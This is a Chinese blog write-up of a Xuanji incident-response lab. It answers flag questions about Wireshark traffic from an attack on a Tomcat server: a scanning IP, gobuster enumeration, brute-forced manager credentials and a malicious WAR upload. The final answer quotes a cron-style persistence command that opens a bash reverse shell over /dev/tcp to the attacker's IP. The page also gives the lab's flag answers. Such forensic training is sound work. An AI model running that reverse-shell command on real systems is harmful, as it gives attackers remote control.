【玄机-应急平台】第六章 流量特征分析-常见攻击事件 tomcat

最新推荐文章于 2025-04-01 19:50:25 发布
最新推荐文章于 2025-04-01 19:50:25 发布
阅读量2.5k 收藏 24
点赞数 26
分类专栏: 数据包分析 # 玄机应急靶场 文章标签: tomcat java Wireshark 流量分析 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/139681477
版权

【玄机-应急平台】第六章 流量特征分析-常见攻击事件 tomcat

前言:

一个不错的应急平台可以练习,感谢玄机应急平台,做点笔记记录一下。

玄机应急平台:https://xj.edisec.net/

流量分析学习专栏学习!

1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}

很多SYN的包nmap扫描就是SYN 所以得到ip

在这里插入图片描述

FLAG:14.0.0.120

2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}

查询ip发现是广东广州的IP提交即可。

在这里插入图片描述

FLAG:guangzhou

3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}

在这里插入图片描述

FLAG:8080

4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}

在这里插入图片描述

FLAG:gobuster

5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}

找到http上传木马的包,追踪数据流Base64解码

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

FLAG:admin:tomcat

6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag{114514.txt}

在这里插入图片描述

FLAG:JXQOZY.war

7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息

在这里插入图片描述

FLAG:/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

总结:

第六章数据包完结,主要是解密,反弹shell命令,ip查询,扫描工具等知知识点🆗期待下期见!

玄机——第六章 流量特征分析-常见攻击事件 tomcat wp
焦虑的焦虑
06-20 4044
第六章 流量特征分析-常见攻击事件
玄机-流量特征分析-蚁剑流量分析
苏生要努力
05-27 1751
1.木马的连接密码是多少2.黑客执行的第一个命令是什么3.黑客读取了哪个文件的内容,提交文件绝对路径4.黑客上传了什么文件到服务器,提交文件名5.黑客上传的文件内容是什么6.黑客下载了哪个文件,提交文件绝对路径。
玄机第六章 流量特征分析-常见攻击事件 tomcat
2301_79716382的博客
03-01 856
流量分析 wireshark的使用
[玄机]流量特征分析-常见攻击事件 tomcat
网安日记本的博客
07-31 1968
[玄机]流量特征分析-常见攻击事件 tomcat题目做法及思路解析(个人分享)
玄机-第六章 流量特征分析-常见攻击事件 tomcat的测试报告
最新发布
ccc_9wy的博客
04-01 472
玄机靶场;第六章 流量特征分析-常见攻击事件 tomcat攻击流程;溯源分析;gobuster;定时任务反弹shelltomcat文件上传。
玄机平台流量特征分析-常见攻击
2301_76227305的博客
06-18 664
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
玄机-应急平台第六章 流量特征分析-蚂蚁爱上树
Aluxian_的博客
06-07 2581
一个不错的应急平台可以练习,做点练习做记录。[X] BiliBili:落寞的鱼丶[X] 公众号:鱼影安全[X] CSDN:落寞的魚丶[X] 知识星球:中职-高职-CTF竞赛欢迎师傅们交流学习~应急响应小组成员老狼在 waf 上下载了一段流量,请你分析黑客攻击手法,并且解答下面问题。
玄机-第六章 流量特征分析-小王公司收到的钓鱼邮件
weixin_62457642的博客
09-29 550
玄机靶场详解
玄机-第二章-日志分析-MySQL应急响应
lin__ying的博客
08-04 343
find ./ -name "*.php" | xargs grep "@eval(" #在当前目录下查找@eval字符串。黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx。#搜索当前目录及其子目录下所有 .php 文件中的 "root" 字符串,并输出包含该字符串的行。cd /var/log/mysql 切换到linux系统中的日志目录的MySQL目录下。#列出MySQL服务器级别的全局系统变量,与“secure”相关的所有变量。
玄机应急响应哥斯拉4.0-流量分析
Lucker_YYY的博客
09-24 945
ssh查看服务器history得到将/tmp/pam_unix.so复制到了/lib/x86_64-linux-gnu/security/pam_unix.so。将pam_unix.so文件下载下来ida打开分析查看函数pam_sm_authenticate 这个函数是用来控制认证的,pam后门常常放在这里。黑客留下后门的反连的IP和PORT是什么?黑客连接webshell时查询当前shell的权限是什么?黑客连接webshell后执行的第一条命令是什么?黑客通过什么漏洞进入服务器的(提交cve编号)
玄机第六章 流量特征分析-蚁剑流量分析
cjchsh的博客
02-21 739
玄机第六章 流量特征分析-蚁剑流量分析
玄机第六章流量特征分析-黑客的攻击流量
m0_64053653的博客
07-09 550
1.黑客成功登录系统的密码2.黑客发现的关键字符串3.黑客找到的数据库密码。
玄机平台流量特征分析-蚁剑流量分析
2301_76227305的博客
06-20 947
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
玄机——第六章 流量特征分析-蚂蚁爱上树 wp
焦虑的焦虑
06-25 2942
第六章 流量特征分析-蚂蚁爱上树
玄机-第六章 流量特征分析-蚁剑流量分析
sucker的博客
02-27 1158
1,已知攻击者使用的webshell的工具是蚁剑,那么攻击者应该预先向服务器上传了木马文件,而且一句话木马上传成功了,那么就可以定位到响应码200的流量。4,问黑客传入什么文件进入服务器,思路很简单:上传文件使用的一般是POST请求,在web服务器文件上传通常使用HTTP的POST方法。"1" : "0");2,问攻击者执行的第一个命令是什么,那么我们就需要查看服务端(已经被攻击者使用蚁剑控制)执行了哪些命令,依然是过滤响应码200的。
玄机-应急平台第六章 流量特征分析-蚁剑流量分析
Aluxian_的博客
05-30 1633
记一次蚁剑流量分析 和总结
玄机-应急平台】第九章-blueteam 的小心思3
Aluxian_的博客
07-19 1711
流量分析学习专栏学习![X] BiliBili:鱼影安全[X] 公众号:鱼影安全[X] CSDN:落寞的魚丶[X] 知识星球:中职-高职-CTF竞赛[X] 信息安全评估(高职)、中职网络安全、金砖比赛、世界技能大赛省选拔选拔赛竞赛培训等欢迎师傅们交流学习~应急响应工程师小 c 被通知服务器有对外链接请求的痕迹,并且提供给了小 c 一段 waf 上截获的数据包,请你分析对应的虚拟机环境跟数据包,找到关键字符串并且尝试修复漏洞。
玄机平台应急响应—webshell查杀
2301_76227305的博客
05-28 2832
以上就是常见的webshell排查手段,至于内存马的排查,那个属于高端的东西没有那么简单滴。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
玄机linux应急第一章
01-23
### Linux应急处理 第一章 内容 #### 1. 环境介绍 在进行Linux应急响应时,首先要确认当前系统的环境。对于Debian系统而言,可以通过命令`lsb_release -a`来查看发行版的具体信息[^1]。 ```bash root@ip-10-0-10-2:~# lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 10 (buster) Release: 10 Codename: buster ``` #### 2. 日志分析基础 日志文件是应急响应中的重要资源之一,在Linux系统中尤其如此。除了常见的syslog外,还存在专门用于记录认证事件的日志文件——`/var/log/auth.log`。此文件不仅限于保存用户的登录尝试情况,还包括了更多类型的账户活动详情[^2]。 为了防止因二进制数据导致的错误输出,在使用工具如`grep`读取这些特殊格式的日志条目时应加上选项`-a`以确保正常解析文本内容: ```bash cat /var/log/auth.log | grep -a "关键词" ``` #### 3. 安全审计案例研究 针对特定场景下的安全审查工作,比如检测是否存在暴力破解攻击行为,则可以利用shell脚本组合多个命令实现自动化统计功能。例如计算某个时间段内成功登陆次数最多的IP地址及其对应的访问频率: ```bash cat /var/log/auth.log* | grep -a "Accepted" | awk '{print $11}' | sort -nr | uniq -c ``` 上述指令将会筛选出所有成功的SSH连接请求,并按照远程主机名或公网IPv4地址分组计数显示出来[^4]。 #### 4. 实战练习提示 当面对实际问题时,可能会遇到各种意外状况,像之前提到过的由于未正确设置参数而引起的程序异常终止等问题都属于常见挑战的一部分。因此建议读者多加实践并熟悉常用调试技巧,以便能够在真实环境中快速定位并解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值